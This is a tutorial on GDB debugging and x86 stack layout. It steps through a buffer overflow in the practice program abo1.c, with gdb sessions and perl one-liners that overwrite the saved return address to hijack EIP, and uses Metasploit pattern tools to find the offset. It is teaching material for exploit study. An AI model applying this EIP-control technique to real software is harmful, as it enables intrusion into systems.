Introduction to Debugging

Prerequisites: 

A basic understanding of fuzzing methods -- https://www.soldierx.com/tutorials/Fuzzing-Basics
Linux installation with a BASH Shell
GCC
GNU Debugger

Debugging is a process of finding software errors in a computer program. Software errors can cause problematic issues during use. These issues can range from memory corruption or allocation errors to referencing invalid data sources. Either way you look at it, software bugs are not desirable and require attention to be remediated. From a security standpoint, software errors can effect flows of a program or process, possibly opening up the possibility of exploitation.

Depending on the type of program we are debugging, we can select the best tools to peel the program apart layer by layer. If we are running a Linux binary, the most common debugger available is called the "GNU Debugger" or GDB. GDB is a powerful debugger, but obscured beneath the classic command line interface (CLI). Through the gdb interface, you are able to disassemble the CPU instructions related to operating the program, set breakpoints, allowing you to examine variables, registers, flags, memory addresses and anything else going on at a specific point of the programs execution.

This ability allows us to make use of the fuzzing methods described in the previous article linked above. By tracking down the parts of a program our fuzzing techniques have broken, we can gain a better understanding on how to take over a process or function in a program. Effectively allowing you to execute code of your choosing.

There are many things that need to be described inside of a debugger. For now we are going to focus on just what we need to know. If you want more information on topics we briefly touch on, feel free to ask in the comments, and I will help you get some resources to better understand the related principal.

Registers:

Registers read and write data to the processor. Each processor architecture carries it's own set of registers unique to it's own capabilities. This is what makes the fundamental difference between system architectures. Intel’s x86 instruction set is most commonly used as most PC's are running x86 or x86_64 Intel based processors. These processors are different than RISC or Alpha based processors.

For this tutorial, we are going to focus on the x86 architecture.

The following are a list of general registers. We will not need to know ALL of these in detail for this session, but a solid understanding of them will help in being able to follow raw machine code cleanly.
--------------------------------------------------------------------------
Temporary variables stored for the CPU:
EAX - Accumulator Register
ECX - Counter Register
EDX - Data Register
EBX - Base Register
--------------------------------------------------------------------------
32-bit addresses that point to specific location in memory
ESP - Stack Pointer
EBP - Base Pointer
--------------------------------------------------------------------------
Pointers that direct to source or destination when data needs written.
ESI - Stack Index
EDI - Destination Index
--------------------------------------------------------------------------
EIP - Instruction Pointer - Points to the current instruction processor is reading
EFLAGS - Several bit flags used for bit-wise logic and operator comparisons

Pointers:

Pointers are a register that will point to some form of data by referencing a memory address. The memory address is 32-bits, or 4-bytes in size, and defined in C source code with a leading asterisk (*). The asterisk is commonly referred to as a dereferencing symbol, removing the reference of the memory address and reading back the data that is stored at that location instead. On the other side of the asterisk is the Address-Of Operator, which looks like an ampersand (&). When used in C, this will return the address of the pointer instead of the data stored inside of it.

&VariableA
*VariableA

EAX, ECX, EDX, sheesh what is with all of these E's?

Well a long time ago, in a land far, far away, there were these ancient machines that ran less than 64-bits, less than 32-bits, but back then, you had a whole 16 bit processor (and less) to work with! Registers and Pointers existed then as well, but back in those times, it was literally just an Accumulator Register, a Stack Pointer and so on... As computing advanced, the 16-bit architecture was Extended to 32-bit addressing.

Did you figure out the "E" now? Correct, they are all Extended XX's, providing 16 more bits.

As mentioned earlier, these all have their different levels of importance, but today we are going to focus on the few that apply to our example.

EIP is going to be the REALLY important pointer, as that tells the processor what the memory address is of current instruction that it should be processing. If you can redirect EIP to a different memory address of your choosing, one that contains the instructions YOU want to run, you have essentially have hit pay-dirt. Controlling the EIP register is going to be whole focus of our exercise...

The Stack:

There are numerous segments that make up the memory of a running program. There are Text, Data, BSS, Heap and Stack segments that work together to pass around the required data, environment variables, etc. Although this is rather expansive, I am going to focus on one segment, called the stack segment.

To be able to understand how such a critically important pointer can be modified, we need to examine the layout of the memory stack created to run your code. This memory stack lays out information relative to the function being ran by the CPU. This information includes uninitialized variables, flags, Saved Frame Pointer, Base Pointer, and other variables being stored for the running function.

Storing certain variables in the stack segment allow those variables to be unique within different functional contexts. For example if VarA is subtracted from VarB in FunctionA, the functional context would be different if VarA is added to VarB in FunctionB.

This segment of memory starts at the high memory addresses, and as more data gets put on, it grows towards the lower memory addresses.

Using the example provided during the last session, abo1.c would have a stack laid out similar to what is described below.

Top of Stack
------------------------- Low memory address/Top of Stack (0xbfff0000)
0xbffff590 $ESP                          |  16 bytes
0xbffff5a0 256 byte array 'buf'         | 264 bytes
0xbffff6a8 $EBP                          |   4 bytes
0xbffff6ac Return Address (RET)  |   4 bytes
------------------------- High memory Addresses/Bottom of Stack (0xffffffff)

Falling back to the previous tutorial, we know that the code used in our vulnerable sample does not check how much data is going to be placed in &buf at 0xbffff5a0 and will gladly push the whole array you input. Our array, does define 256 bytes for the array, so when the stack gets setup, 256 bytes, plus an 8 byte buffer are allocated. When the 300 byte array gets copied into buf using strcpy, nothing is checked beyond what has already been allocated, pushing the rest of the 300 bytes over the 8 byte buffer, over the 4 bytes for $EBP and even over the 4 bytes allocated for Saved Frame Pointer or Return Address at 0xbffff6ac. Since we wrote only the letter A, our return address directs us to 0x41414141, which is not a valid memory address for this binary.

If you look in the stack example earlier, you can see how memory addresses are formatted along left hand side. Being able to understand how memory is laid out is not only extremely important during the exploitation process, but can prove extremely difficult to gain a solid grasp on.

Beyond understanding the stack, and how data is organized inside of it, we really need to know how to debug a running binary, and how to use the debugger to reveal the aspects of the binary we are trying to exploit.

As mentioned earlier, we are going to be working with the GNU Debugger, or otherwise referred to as 'gdb'. From the BASH prompt on a Linux terminal, you should be able to start up gdb with our test binary loaded.

--------------------------------
$ gdb ./abo1
GNU gdb 6.6-debian
Copyright (C) 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb)
--------------------------------

We already know that 300 bytes pushed to abo1 will cause a segmentation fault, as explained earlier, so let us give that a try from gdb.

--------------------------------
(gdb) run $(perl -e 'print "A"x300')
Starting program: ./abo1 $(perl -e 'print "A"x300')

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
--------------------------------

Remember how we had discussed 0x41 being the letter "A" in Hexadecimal ASCII? It appears the letter "A" has ended up going somewhere it wasn't intended to go!

Let us take a closer look at what is going on by setting a break-point before our argc[1] gets strcpy'd into buf.

--------------------------------
(gdb) list 1
1       /* abo1.c                                       *
2        * specially crafted to feed your brain by gera */
3
4       /* Dumb example to let you get introduced...    */
5
6       int main(int argv,char **argc) {
7               char buf[256];
8
9               strcpy(buf,argc[1]);
10      }
(gdb) break 9
Breakpoint 1 at 0x8048387: file abo1.c, line 9.
(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: ./abo1 $(perl -e 'print "A"x300')

Breakpoint 1, main (argv=2, argc=0xbffff724) at abo1.c:9
9               strcpy(buf,argc[1]);
(gdb)
--------------------------------

Following along above, we can list the source code associated with abo1.c due to compiling the source code earlier with gcc using the flags -g, keeping the gnu debugging symbols associated with the binary. The command list, followed by the line number you wish to start listing from, will display the selected source code. Since it's a small program, and we want to see the entire code, we can just use 1 for the argument in list.

The vulnerable section of code is on line 9, so we can set a breakpoint in gdb using the break command, followed by the line number we wish to set the breakpoint on.

Entering run into GDB will restart the program from beginning, stopping at the first breakpoint specified. This is the state of the program before our fuzzed data gets pushed unto the stack and into the location of buf.

Using gdb, we can then examine aspects of memory being called by the binary. We know one variable named 'buf' exists, and it can be checked by the following:

--------------------------------
(gdb) x/x buf
0xbffff590:     0xb7e9da28
--------------------------------

buf is stored at 0xbffff590 holding the value 0xb7e9da28. This value can be retrieved using the examine string command as noted below.

--------------------------------
(gdb) x/s buf
0xbffff590:      "(????\201\004\b.N=??\201\004\b?\201\004\b"
--------------------------------

You should notice that the string data stored at this location is all junk. Uninitialized data. This is because 'buf' is empty until the strcpy function copies argc[1] into it.

What other values did we discuss earlier? EBP and ESP, our base and stack pointers. We can view that data in much of the same way:

--------------------------------
(gdb) x/x $ebp
0xbffff698:     0xbffff6f8
(gdb) x/x $esp
0xbffff580:     0xf63d4e2e
--------------------------------

Following along with the addresses noted on the left hand side of the output, we can see the memory addresses for each of these values.

0xbffff580 (ESP)
0xbffff590 (buf)
0xbffff698 (EBP)

If you wanted to find out the difference in bytes between each of these fields, you could use the following print command:
--------------------------------
(gdb) print 0xbffff698 - 0xbffff590
$1 = 264
(gdb) print 0xbffff590 - 0xbffff580
$2 = 16
--------------------------------

Subtracting EBP from buf will give you the size of the buffer allocated for buf at 264 bytes. Add 4 bytes to 264 to overwrite EBP, and you have a total of 268 bytes to fill from the start of buffer to the end of the Extended Base Pointer. As mentioned earlier, our return address in the Saved Frame Pointer is stored directly after EBP, storing the memory address of the next instruction the CPU needs to jump to. Since we know RET is going to be 4 bytes in length, 268 + 4 means the entire length of the buffer we need to use to exploit needs to be 272 bytes in length from beginning to end.

Now that we have our boundaries defined and understood before our fuzzed code gets copied into 'buf', we can continue the debugger and see what happens.

--------------------------------
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
--------------------------------

Back to the crash seen earlier. Let us browse around for a minute, and review the memory addresses we were able to obtain during the last pass of gdb...

If you remember 0xbffff590 was the reported location of buf, we can use the examine command once again, to peek at that location in memory:

--------------------------------
(gdb) x/x 0xbffff590
0xbffff590:     0x41414141
(gdb) x/s 0xbffff590
0xbffff590:      'A' <repeats 200 times>...
--------------------------------

Yep, the letter A is in the buffer, and repeating a bunch of times, but not the 300 times we specified! Let's keep looking...
--------------------------------
(gdb) x/x 0xbffff698
0xbffff698:     0x41414141
(gdb) x/s 0xbffff698
0xbffff698:      'A' <repeats 36 times>
--------------------------------

EBP was at 0xbffff698 and it appears the letter A has found its way in there too! EIP had obviously picked up the letter A from the SFP or Return Address as well, when execution flow got redirected to 0x41414141. So we know our buffer filled out a lot of space in the running binary.

Using the methods shown a little earlier, we can fine tune our fuzzed string to validate the different portions of the code in use.

We know buf is allocated 264 bytes in the stack and 4 bytes passed that is EBP and 4 bytes passed that is our SFP. Splitting up our fuzzing string, we can use different letters to highlight our boundaries and area within the process we can modify/overwrite.

--------------------------------
(gdb) run $(perl -e 'print "A"x264 . "B"x4 . "C"x4')
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: ./abo1 $(perl -e 'print "A"x264 . "B"x4 . "C"x4')

Breakpoint 1, main (argv=2, argc=0xbffff744) at abo1.c:9
9               strcpy(buf,argc[1]);
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x43434343 in ?? ()
--------------------------------

Letting our fuzzed string continue through the break-point, 0x41414141 has changed to 0x43434343 or the letter C.

Looking at the string passed into abo1, if we were to examine the binaries Base Pointer, we can expect to see 0x42424242 stored in there.

--------------------------------
(gdb) x/x $ebp
0x42424242:     Cannot access memory at address 0x42424242
--------------------------------

Now all of our bounds have been defined clearly. We know where our buffer sits, we know where our base pointer is going, and we know we can hijack the address loaded into EIP from the SFP.

As one final test to see if the debugger has given us the proper values, let us format one final string to pass, seeing if we can redirect EIP to an actual memory address. For our example here, we are going to use the fictional (but valid) memory address of 0xdeadbeef.

Going back to the super fun exploit math mentioned earlier, it is 268 bytes to overwrite the SFP, and then the memory address we want to replace it with, so EIP will jump there when the vulnerable function is called...

--------------------------------
(gdb) run $(perl -e 'print "A"x268 . "\xde\xad\xbe\xef"')
Starting program: ./abo1 $(perl -e 'print "A"x268 . "\xde\xad\xbe\xef"')

Breakpoint 1, main (argv=2, argc=0xbffff744) at abo1.c:9
9               strcpy(buf,argc[1]);
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0xefbeadde in ?? ()
--------------------------------

Can you identify what happened in this example? We successfully caused a segmentation fault, but look at the address it tried to jump to:

0xefbeadde in ?? ()

That doesn't look quite right, specially since we know we wanted to go to 0xdeadbeef. Can anyone here explain this oddity?

One thing when working in Intel's x86 based architecture, it relies on Little-Endian addressing. This means that addresses increase by the least significant byte value, allowing other bites to follow, increasing by order of significance. So simplify, this means that addresses get put into place backwards. When passing the string \xde\xad\xbe\xef into the buffer to populate the SFP's return address, it should be pushed on there backwards, as shown below:

--------------------------------
(gdb) run $(perl -e 'print "A"x268 . "\xef\xbe\xad\xde"')
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: ./abo1 $(perl -e 'print "A"x268 . "\xef\xbe\xad\xde"')

Breakpoint 1, main (argv=2, argc=0xbffff744) at abo1.c:9
9               strcpy(buf,argc[1]);
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0xdeadbeef in ?? ()
--------------------------------

And BINGO! Our binary segfaulted jumping to 0xdeadbeef, just like we wanted.

Now that we know the exact point we can use to jump program execution elsewhere, the rest is just a matter of finding out where to jump execution to! The specifics of that portion will be addressed in the session after this. Our goal today was to overwrite EIP with a location of our choosing, in which was accomplished by sending it to (nonexistent) 0xdeadbeef.

As an exercise for the group, you have seen the method utilizing perl I had employed to accomplish this task. Can any of you remember the syntax to achieve the same result using Python as described in our last session?

Now that we have addressed the hard method of finding the distances between our values in the stack, we are going to approach this with an easier, new and improved method. Using Metasploit's pattern_create.rb and pattern_offset.rb included with the Metasploit Framework.

If you remember from the previous session, pattern_create.rb will create a string of a size you specify. In our fuzzing example, we used a 300 byte patter, so we will do the same again here:

--------------------------------
/var/opt/framework-4.0.0/msf3/tools$ ./pattern_create.rb 300Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9
Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1
Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj
4Aj5Aj6Aj7Aj8Aj9
--------------------------------

Using gdb's run command, you can copy the string provided by pattern_create.rb into the argc[1] field, or call $(/var/opt/framework-4.0.0/msf3/tools/pattern_create.rb 300) after run:
--------------------------------
(gdb) run Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7
Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8A
f9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0
Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9
Starting program: .abo1 Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3
Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4
Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5A
i6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9

Breakpoint 1, main (argv=2, argc=0xbffff724) at abo1.c:9
9               strcpy(buf,argc[1]);
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x6a413969 in ?? ()
--------------------------------

Our segmentation fault happened at 0x6a413969 in ?? (). We can use the address provided in pattern_offset.rb now, to discover how far the buffer has be to overwrite the SFP.l
--------------------------------
/var/opt/framework-4.0.0/msf3/tools$ ./pattern_offset.rb 0x6a413969
268
--------------------------------

268 is exactly the same number we were able to determine by subtracting EBP from buf (264) and adding 4 bytes to pad past EBP (268). Except this method was much more efficient at returning our target value.

I did wish to cover a few debugging applications for Windows as well as GDB, but in the interests of saving time, and saving a display on my total inability to use Windows itself, perhaps we will review OllieDBG, Immunity and various debuggers at a later time.